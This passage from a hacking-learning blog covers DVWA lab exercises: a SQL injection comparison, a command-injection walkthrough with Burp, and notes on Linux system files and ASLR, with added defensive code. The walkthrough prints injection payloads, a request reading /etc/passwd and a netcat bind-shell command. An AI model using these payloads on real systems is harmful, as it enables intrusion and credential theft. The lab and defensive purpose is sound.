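    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, user_id: str) -> list:
    """Bound parameter: the driver ships the value separately from the statement,
    so it is compared as data and can never change the query's structure."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def compare(user_id: str) -> dict:
    """Row counts each version returns for one input."""
    con = make_db()
    return {"vulnerable": len(lookup_vulnerable(con, user_id)),
            "safe": len(lookup_safe(con, user_id))}


if __name__ == "__main__":
    for value in ("1", "1' OR '1'='1"):
        print(f"{value!r:16} -> {compare(value)}")
```

<div>
For a plain id both versions return the same row; for the classic tautology the string-built query hands back the whole table while the bound parameter is simply compared against user_id as text and matches nothing. Escaping the input (as the medium level of DVWA does) narrows the hole; binding parameters removes it.</div>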
</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-10139166675986428972011-09-03T19:48:00.000+05:302011-09-03T19:48:38.152+05:30Command Execution on DVWA<div dir="ltr" style="text-align: left;" trbidi="on">
So, the other day, I started delving into webappsec and I hit a bummer very soon, hence this post.<br />
Getting started in webappsec is not that hard actually; there are tons of resources for that, just Google it.<br />
I think the best way to learn something is by actually doing it. There are many "vulnerable by design" distros and live sites for practising web application hacking.<br />
In this post I am going to write about <a href="http://www.dvwa.co.uk/">DVWA </a>and the Command Execution vulnerability present in it, and how to exploit it.<br />
This being the first post regarding DVWA, I will start with the setup and tools required for this part. Let's get started!<br />
<br />
<a name='more'></a><br />
<br />
<b>Web security dojo</b><br />
It is a complete distro for web application hackers. It contains various security testing tools and vulnerable web applications, providing a complete testing environment out of the box.<br />
You can visit the homepage <a href="http://www.mavensecurity.com/web_security_dojo/">here</a><br />
And download it from <a href="http://sourceforge.net/projects/websecuritydojo/files/">here</a><br />
<br />
<b>Damn Vulnerable Web Application</b><br />
As the name suggests, it is a damn vulnerable web application. You get all of the OWASP Top 10 vulnerabilities in this package for your exploitation pleasure, but no prizes for getting a shell, because it is designed for that purpose ;)<br />
I am using Web Security Dojo, which has DVWA already installed along with other vulnerable webapps, so there is no need to download it.<br />
If you want to download and set it up yourself, you can get it from <a href="http://www.dvwa.co.uk/">here</a>.<br />
<br />
<b>Burp suite</b><br />
It is an integrated platform for performing security testing of web applications. Again, I am using this tool off the 'dojo'.<br />
Download and more: <a href="http://portswigger.net/burp/">Burp Suite</a><br />
<br />
Figure out how to start DVWA and Burp, and how to have Burp intercept all the traffic between your browser and the web application. It's really easy ;)<br />
<br />
That's all we need for this part. Let's get started with <b>Command Execution</b><br />
<b><br /></b><br />
Command Execution is a technique used, via a web interface, to execute OS commands on the web server.<br />
Go to the command execution page. We are greeted with a text box and a submit button for a free ping utility.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-8k2zqmjbRz4/TmIOtuPCedI/AAAAAAAAB2E/7y8csn_6rnk/s1600/Web+Security+Dojo+v1.2-2011-09-03-16-56-42.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-8k2zqmjbRz4/TmIOtuPCedI/AAAAAAAAB2E/7y8csn_6rnk/s200/Web+Security+Dojo+v1.2-2011-09-03-16-56-42.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Enter an IP address and click on submit. The request will be intercepted by burp.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-fbS-u126VXs/TmITCEHUXdI/AAAAAAAAB2I/Bk9DGA_zkhw/s1600/Web+Security+Dojo+v1.2-2011-09-03-17-10-01.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://2.bp.blogspot.com/-fbS-u126VXs/TmITCEHUXdI/AAAAAAAAB2I/Bk9DGA_zkhw/s200/Web+Security+Dojo+v1.2-2011-09-03-17-10-01.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, the app sends the IP address we provided and then calls the submit function.<br />
Next, try providing 127.0.0.1 & ls as input, hoping it will be that easy, but you will be welcomed by this screen instead:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Tkb5F3t3MUM/TmIVvjWcgVI/AAAAAAAAB2M/yURo0qU8wo8/s1600/Web+Security+Dojo+v1.2-2011-09-03-17-26-07.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://1.bp.blogspot.com/-Tkb5F3t3MUM/TmIVvjWcgVI/AAAAAAAAB2M/yURo0qU8wo8/s200/Web+Security+Dojo+v1.2-2011-09-03-17-26-07.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Try as many variations as you like to get a command executed. You will see this every time!<br />
<br />
Well, that is a bummer! Any modification to the IP address is caught as invalid! And they said it was an easy demo!<br />
After looking carefully, you will see that the security level is set to <b>high</b>, as shown in the 2nd screenshot.<br />
Let's get introduced to DVWA security then...<br />
<b>DVWA security</b><br />
DVWA comes with a very nice feature which lets you control the security level of the web app; it is set to high by default after installation. This lets you try your skills against environments from low to high security. According to the documentation, the high security mode is secure against all of the vulnerabilities and demonstrates good programming practices. There is a link on each page which shows the source code for each mode, so you can compare the secure and insecure practices. Very nice. Now change it to <b>low</b> and let us try again...<br />
<br />
After you enter an IP and the request is intercepted by Burp, we will modify it on the fly and forward it to the app to see its response.<br />
To modify a request on the fly, open Burp Suite and go to the raw request captured, as we have seen earlier. Place the cursor at the end of the IP address and change the content there. We want to add a command to it, and we want it to be URL-encoded: right-click in the window and choose the 'URL-encode as you type' option.<br />
I provided 127.0.0.1[space]&[space]ls&security as input; it should look like this:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-CAcaysZfLw0/TmIuwobXDEI/AAAAAAAAB2Q/2qzMxRsDZT8/s1600/Web+Security+Dojo+v1.2-2011-09-03-19-05-52.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="150" src="http://4.bp.blogspot.com/-CAcaysZfLw0/TmIuwobXDEI/AAAAAAAAB2Q/2qzMxRsDZT8/s200/Web+Security+Dojo+v1.2-2011-09-03-19-05-52.png" width="200" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Forward this request and return to the browser.<br />
Yay! It is successful!<br />
<br />
<br />
<span style="color: red;">help</span><br />
<span style="color: red;">index.php</span><br />
<span style="color: red;">source</span><br />
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.008 ms<br />
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.007 ms<br />
That is the directory listing we have been waiting for! So this was <b>this easy</b> after all! After you see successful command execution, do a victory dance and return to your desk. We can do so much with this!<br />
Send in cat /etc/passwd:<br />
<span style="color: blue;">ip=127.0.0.0+cat+/etc/passwd</span><br />
We get:<br />
<br />
<span style="color: red;">root:x:0:0:root:/root:/bin/bash</span><br />
<span style="color: red;">daemon:x:1:1:daemon:/usr/sbin:/bin/sh</span><br />
<span style="color: red;">bin:x:2:2:bin:/bin:/bin/sh</span><br />
<span style="color: red;">sys:x:3:3:sys:/dev:/bin/sh</span><br />
<span style="color: red;">sync:x:4:65534:sync:/bin:/bin/sync</span><br />
<span style="color: red;">games:x:5:60:games:/usr/games:/bin/sh</span><br />
<span style="color: red;">man:x:6:12:man:/var/cache/man:/bin/sh</span><br />
<span style="color: red;"><<snip>></span><br />
Or read the web.config file, or get a shell..?<br />
<span style="color: blue;">ip=127.0.0.1+nc+-l+-p+31337+-e+/bin/sh&submit=submit</span><br />
<div style="color: blue;">
<br /></div>
<div>
Connect to port 31337 and enjoy :)</div>
<div>
<br /></div>
<div>
It was really a basic thing, but I have written a huge post; hope my blog will get some hits ;)</div>
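<div>
The injection above works because the low-security page builds a shell command string around whatever was submitted as <span style="font-family: 'Courier New', Courier, monospace;">ip</span>, so the shell sees the &amp; and runs what follows. The Python below is an added example, not DVWA's code: it shows the unsafe string being built (returned, never run), the two fixes that close the hole (parse the input as an IP address, and call ping with an argv list instead of going through a shell), and a small check you can run over a captured query string like the ones in this post. Function names are mine.</div>

```python
"""Validating the `ip` parameter of a ping-style page.

Added example, not DVWA's PHP: the unsafe command string (returned, never
executed), the two fixes that close the hole, and a checker for captured query
strings like the ones in this post. Function names are mine.
"""
import ipaddress
import subprocess
from typing import Optional
from urllib.parse import parse_qs

SHELL_METACHARS = "&|;`$<>()\n"


def command_line_unsafe(ip: str) -> str:
    """What the vulnerable page effectively hands to the shell: the raw input is
    spliced into a command line, so '&' and friends keep their shell meaning."""
    return "ping -c 3 " + ip


def validate_ip(ip: str) -> Optional[str]:
    """Canonical address if `ip` is a single IPv4/IPv6 address, else None.
    ipaddress rejects hostnames, CIDR ranges and anything with extra characters."""
    try:
        return str(ipaddress.ip_address(ip.strip()))
    except ValueError:
        return None


def ping_argv(ip: str) -> Optional[list]:
    """argv for a safe ping: the validated address only, and no shell involved,
    so there is nothing left that could interpret metacharacters."""
    addr = validate_ip(ip)
    return None if addr is None else ["ping", "-c", "3", addr]


def run_ping(ip: str) -> Optional[int]:
    """Run the hardened form (returns the exit status), or None if rejected."""
    argv = ping_argv(ip)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True).returncode


def inspect_request(query: str) -> dict:
    """Decode a captured query string and judge its ip value: useful both for the
    fix (what to reject) and for spotting attempts in logs (metacharacters)."""
    ip = parse_qs(query).get("ip", [""])[0]           # '+' and %26 are decoded here
    return {"ip": ip,
            "valid": validate_ip(ip) is not None,
            "metachars": [c for c in SHELL_METACHARS if c in ip]}


if __name__ == "__main__":
    for q in ("ip=127.0.0.1&submit=submit",
              "ip=127.0.0.1+%26+ls&submit=submit"):        # the request built in Burp above
        print(inspect_request(q))
    print(command_line_unsafe("127.0.0.1 & ls"))
```

<div>
Blacklisting characters (which is roughly what the higher DVWA levels do) is the weaker of the two defences, because the list is never complete; parsing the value as an address and never invoking a shell means there is no string for an attacker to break out of in the first place. The metachars field is only there for detection, e.g. when scanning web server logs for attempts against a page like this.</div>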
<div>
References:<br />
<a href="https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf">https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf</a></div>
<div>
<br /></div>
<br />
<br /></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-4538251661335272060.post-15046485431019611842011-08-27T12:39:00.000+05:302011-08-27T12:39:57.498+05:30Quick Links<div dir="ltr" style="text-align: left;" trbidi="on">I was working on Linux privilege escalation and found these 2 very useful pages.<br />
1. This gives a quick intro to Linux privilege escalation.<br />
<a href="http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html">http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html</a><br />
<br />
2. And this gives a detailed description of the above post! Kudos to g0tmi1k!<br />
<a href="http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html">http://g0tmi1k.blogspot.com/2011/08/basic-linux-privilege-escalation.html</a></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-4538251661335272060.post-9161039389137909772011-08-19T23:38:00.000+05:302011-08-27T12:46:03.642+05:30Linux for hackers - Part II<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div style="background-color: transparent;"><div class="separator" style="clear: both; text-align: center;"><a href="http://imgs.xkcd.com/comics/cautionary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://imgs.xkcd.com/comics/cautionary.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div style="background-color: transparent;"><span id="internal-source-marker_0.2205236447043717" style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After posting the 1st part and my </span><a href="http://www.betterhacker.com/2011/07/linux-for-hackers-part-i.html"><span style="background-color: transparent; color: #000099; font-family: Arial; font-size: 12pt; vertical-align: baseline; white-space: pre-wrap;">1st entry</span></a><span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the blog, I decided that I would post at least 1 new entry every week, but here I am again, writing after 4 weeks. Now, looking back, I feel like the 1st entry isn't how I wanted it to be.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I wanted to put down the things present in Linux which are required by hackers most often. So in this part, I will list all such things and briefly explain their importance, so that it doesn't look like a tutorial.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obviously this list is not exhaustive or authoritative. I might miss something very important and put in something very basic, because I am no master of Linux. I am still learning and I will always be learning.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<a name='more'></a><span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Various directories and their importance:</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Configuration files specific to the machine are kept here.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/dev</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Device files. In *nix systems, everything is a file. This directory contains special files which enable us to interact with various devices.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/usr </span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">All programs are installed here.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/var/log</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Stores log files from various programs. </span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Important Files:</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/passwd</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file contains one entry per line for each user (or user account) of the system. All fields are separated by a colon (:) symbol. There are seven fields in total, as follows:</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<ol><li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Username</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Password</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: An x character indicates that the encrypted password is stored in the /etc/shadow file.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User ID (UID)</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further, UIDs 100-999 are reserved by the system for administrative and system accounts/groups.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Group ID (GID)</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The primary group ID (stored in the /etc/group file).</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">User ID Info</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The comment field. It allows you to add extra information about the user, such as the user's full name, phone number, etc. This field is used by the finger command.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Home directory</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The absolute path to the directory the user will be in when they log in. If this directory does not exist, the user's directory becomes /.</span></li>
<li style="background-color: transparent; font-family: Arial; font-size: 11pt; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><span style="background-color: transparent; color: #111111; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Command/shell</span><span style="background-color: transparent; color: #111111; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: The absolute path of the user's login command or shell (e.g. /bin/bash).</span></li>
</ol><br />
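The seven-field layout above is easiest to remember once you have parsed it yourself. The following is an added example, not code from the original post: a small POSIX sh script that splits /etc/passwd-style lines on the colon separator and reports the entries an administrator would want to review (a second UID 0 account, or an empty password field). The sample lines are constructed for this example; point the functions at the real file contents to audit a live system.

```shell
#!/bin/sh
# Added example (not from the original post): parse /etc/passwd-style lines
# field by field and flag entries worth a closer look.
# SAMPLE_PASSWD is constructed for this example; it is not a real system's file.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice Example,,555-0100:/home/alice:/bin/bash
backup:x:0:0:legacy backup account:/var/backups:/bin/sh
guest::1001:1001:Guest:/home/guest:/bin/bash'

# Print one line per entry in the form "username uid gid shell".
# Fields: 1 user, 2 password, 3 UID, 4 GID, 5 comment, 6 home, 7 shell.
# $1: text in /etc/passwd format
passwd_summary() {
    printf '%s\n' "$1" | awk -F: 'NF == 7 { print $1, $3, $4, $7 }'
}

# Report entries that need review:
#   malformed: wrong number of colon-separated fields
#   uid0:      UID 0 under a name other than root (a second superuser)
#   nopass:    empty password field (login without any password)
# $1: text in /etc/passwd format
passwd_findings() {
    printf '%s\n' "$1" | awk -F: '
        NF != 7                  { print "malformed: " $0; next }
        $3 == 0 && $1 != "root"  { print "uid0: " $1 }
        $2 == ""                 { print "nopass: " $1 }
    '
}

# Usage on the constructed sample; on a real host pass "$(cat /etc/passwd)".
echo "== summary"
passwd_summary "$SAMPLE_PASSWD"
echo "== findings"
passwd_findings "$SAMPLE_PASSWD"
```

The comment field in the "alice" line contains commas, which is why splitting on ":" rather than on any punctuation matters; the field count stays at seven.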
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/shadow</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file stores the actual password for each user account in encrypted form.</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/services</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file maps port numbers to service names.</span><br />
<span style="background-color: transparent; color: #111111; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/hosts</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Contains host names and their corresponding IP addresses, used for name resolution.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/resolv.conf</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This file is used to configure the Domain Name System (DNS) resolver library.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/etc/network/interfaces</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Configuration of the available network interfaces.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/proc/cpuinfo</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Information about the processor.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/proc/uptime</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The time the system has been up.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/proc/sys/kernel/randomize_va_space</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This special file holds the setting that determines the kind of address space layout randomization (ASLR) applied to processes on the system.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Possible values are:</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">0 - No address space randomization</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1 - Randomize the addresses of the mmap base, the stack and the VDSO page.</span><br />
<span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2 - Additionally enable heap randomization</span></div><div style="background-color: transparent;"><span style="background-color: transparent; font-family: Arial; font-size: 12pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
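The value in that file is only half the story; what matters is whether fresh processes actually land at different addresses. The script below is an added example, not part of the original post: it reads the setting (from a path you can override, so the test uses a sample file), maps it to the three meanings listed above, and then checks empirically whether two newly started processes get different stack mappings by reading their /proc/self/maps. On systems without /proc the empirical check reports "unavailable" instead of failing.

```shell
#!/bin/sh
# Added example (not from the original post): inspect and verify ASLR.

# Translate a randomize_va_space value into its meaning. $1: the value.
describe_va_space() {
    case "$1" in
        0) echo "0: no address space randomization (ASLR disabled)" ;;
        1) echo "1: mmap base, stack and VDSO page randomized" ;;
        2) echo "2: mmap base, stack, VDSO page and heap randomized" ;;
        *) echo "unknown value: $1"; return 1 ;;
    esac
}

# Read the current setting. $1 (optional) overrides the path, which lets
# the example run against a sample file on a non-Linux host.
read_va_space() {
    f="${1:-/proc/sys/kernel/randomize_va_space}"
    [ -r "$f" ] || { echo "unavailable"; return 1; }
    tr -d '[:space:]' < "$f"
}

# Empirical check: start two separate processes and compare the start
# address of their [stack] mapping. /proc/self inside the grep refers to
# the grep process itself, so each call sees a freshly created process.
# Prints "randomized", "static" or "unavailable".
stack_randomization() {
    [ -r /proc/self/maps ] || { echo "unavailable"; return 0; }
    a=$(grep '\[stack\]' /proc/self/maps | cut -d- -f1)
    b=$(grep '\[stack\]' /proc/self/maps | cut -d- -f1)
    if [ -z "$a" ] || [ -z "$b" ]; then
        echo "unavailable"
    elif [ "$a" = "$b" ]; then
        echo "static"
    else
        echo "randomized"
    fi
}

# Usage: report the live setting and the observed behaviour.
if v=$(read_va_space); then
    describe_va_space "$v"
else
    echo "randomize_va_space is not readable on this system"
fi
echo "stack mapping: $(stack_randomization)"
```

A mismatch between the two (the file says 2 but the stack check says "static") is worth investigating: the setting can be overridden per process, for example by a debugger or a wrapper that disables randomization for its children.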
</span></div><div style="background-color: transparent;"><span style="font-family: Arial;"><span style="white-space: pre-wrap;">That's all for this part, then. It barely scratches the vast surface of Linux systems, but it is a start nonetheless. In the next part, I am planning to document some of the most important command line tools for hackers. Let's hope it comes soon! </span></span></div><div style="background-color: transparent;"><span style="font-family: Arial;"><span style="white-space: pre-wrap;"><br />
</span></span></div></div></div>Linux for hackers - Part I (published 2011-07-23T12:28:00.000+05:30, updated 2011-08-27T12:45:29.880+05:30)<div dir="ltr" style="text-align: left;" trbidi="on"><br />
<div style="background-color: transparent;"><span id="internal-source-marker_0.0038698429707437754" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Hackers & Linux share a very intimate relationship. Linux offers hackers all the freedom they need, and that is the very thing hackers care about! You can do whatever you like with your system, and that is the biggest factor in Linux's favour. Achieving perfection, however, can be a daunting task given the enormity of this OS.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In this multi-part series, I will be discussing which basic Linux utilities are needed on a day to day basis. This will also serve as a reference for me if I forget something ;)</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">One thing to note here is that this is not a “Linux for beginners” tutorial. This is “Linux for newbie hackers”.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I have handpicked some of the most important things that one must know. These utilities are not listed in any particular order.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<a name='more'></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br />
</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 14pt; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">GREP</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">‘grep’ is one of the most important and useful commands. It is very helpful in awk, shell, sed and perl scripting.</span><br />
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
